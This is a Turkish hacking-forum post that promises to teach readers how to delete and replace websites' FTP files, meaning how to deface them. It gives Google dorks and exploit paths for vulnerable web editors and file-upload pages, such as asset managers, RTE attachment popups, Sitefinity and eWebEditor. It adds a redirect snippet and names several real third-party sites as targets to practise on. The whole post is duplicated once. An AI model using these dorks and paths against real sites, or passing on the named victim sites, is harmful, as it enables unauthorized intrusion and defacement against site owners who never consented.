Merhaba THT üyeleri, işte size sitenin FTP dosyalarını nasıl silip değiştirebileceğinizi, yani hackleyeceğinizi öğreteceğimm. :yo
Editör Açığı
dork:editor/assetmanager/
siteadi.com/Editor/assetmanager/assetmanager.asp yada /Editor/assetmanager/assetmanager.php
farklı dizinlere yuklene bilir
Editor/asset/? dedir genelde....
Editör Test Site
asp
http://davton.com/admin/MembersAreaM...setmanager.asp
http://trackdata.com.au/Editor/asset...lter=&upload=Y
http://www.1bakersfield.com/Editor/a...setmanager.asp
php
http://taxihoanglong.com.vn/Editor/a...?ffilter=image
http://www.lancasterdepewponytails.c...setmanager.php
Rte Açığı
Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/
Exploit: site.com/rte/RTE_popup_file_atch.asp
display_form_submission.asp
editar_pagina.asp
editar_pagina.asp.aspx
editar_pagina.aspx
editar_pagina2.asp
favicon.ico
non_RTE_javascript.asp
non_RTE_upload_files.asp
non_RTE_upload_images.asp
pagina.aspx
RTE_editor_inc.asp
RTE_file_browser.asp
RTE_javascript.asp
RTE_javascript_common.asp
RTE_javascript_gecko.asp
RTE_popup_about.asp
RTE_popup_adv_image.asp
RTE_popup_emoticons.asp
RTE_popup_file_atch.asp
RTE_popup_image.asp
RTE_popup_image_preview.asp
RTE_popup_link.asp
RTE_popup_link_preview.asp
RTE_popup_open_file.asp
RTE_popup_preview.asp
RTE_popup_save_file.asp
RTE_popup_special_characters.asp
RTE_popup_table.asp
RTE_popup_word_paste.asp
Rte Test Site
http://www.jrf.org.tw/newjrf/rte/RTE..._file_atch.asp
http://www.richmond-utcoll.ac.uk/spo..._file_atch.asp
Attach File Properties
http://mhc.thelearningcentre.ie/rte/..._file_atch.asp
Sitefinity: Login Açığı
Dork: "Sitefinity: Login"
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Upload Açığı
inurl:"/admin/saveannounce_upload.asp"
inurl:"admin/eWebEditor/Upload.asp"
inurl:"UploadFile/upload.asp"
inurl:/cgi-bin/ourspace/
/cgi-bin/ourspace/newswire/uploadmedia.cgi.
WebMaster Açığı
index.asp?PID=1
index.asp?AL=1
<**** http-equiv="*******" content="0;URL=http://testsite.com">
Xpoll Açığı
inurl:xpoll/admin
[Edit darkdesert// ALINTIDIR]
Editör Açığı
dork:editor/assetmanager/
siteadi.com/Editor/assetmanager/assetmanager.asp yada /Editor/assetmanager/assetmanager.php
farklı dizinlere yuklene bilir
Editor/asset/? dedir genelde....
Editör Test Site
asp
http://davton.com/admin/MembersAreaM...setmanager.asp
http://trackdata.com.au/Editor/asset...lter=&upload=Y
http://www.1bakersfield.com/Editor/a...setmanager.asp
php
http://taxihoanglong.com.vn/Editor/a...?ffilter=image
http://www.lancasterdepewponytails.c...setmanager.php
Rte Açığı
Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/
Exploit: site.com/rte/RTE_popup_file_atch.asp
display_form_submission.asp
editar_pagina.asp
editar_pagina.asp.aspx
editar_pagina.aspx
editar_pagina2.asp
favicon.ico
non_RTE_javascript.asp
non_RTE_upload_files.asp
non_RTE_upload_images.asp
pagina.aspx
RTE_editor_inc.asp
RTE_file_browser.asp
RTE_javascript.asp
RTE_javascript_common.asp
RTE_javascript_gecko.asp
RTE_popup_about.asp
RTE_popup_adv_image.asp
RTE_popup_emoticons.asp
RTE_popup_file_atch.asp
RTE_popup_image.asp
RTE_popup_image_preview.asp
RTE_popup_link.asp
RTE_popup_link_preview.asp
RTE_popup_open_file.asp
RTE_popup_preview.asp
RTE_popup_save_file.asp
RTE_popup_special_characters.asp
RTE_popup_table.asp
RTE_popup_word_paste.asp
Rte Test Site
http://www.jrf.org.tw/newjrf/rte/RTE..._file_atch.asp
http://www.richmond-utcoll.ac.uk/spo..._file_atch.asp
Attach File Properties
http://mhc.thelearningcentre.ie/rte/..._file_atch.asp
Sitefinity: Login Açığı
Dork: "Sitefinity: Login"
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Upload Açığı
inurl:"/admin/saveannounce_upload.asp"
inurl:"admin/eWebEditor/Upload.asp"
inurl:"UploadFile/upload.asp"
inurl:/cgi-bin/ourspace/
/cgi-bin/ourspace/newswire/uploadmedia.cgi.
WebMaster Açığı
index.asp?PID=1
index.asp?AL=1
<**** http-equiv="*******" content="0;URL=http://testsite.com">
Xpoll Açığı
inurl:xpoll/admin
[Edit darkdesert// ALINTIDIR]
Moderatör tarafında düzenlendi:
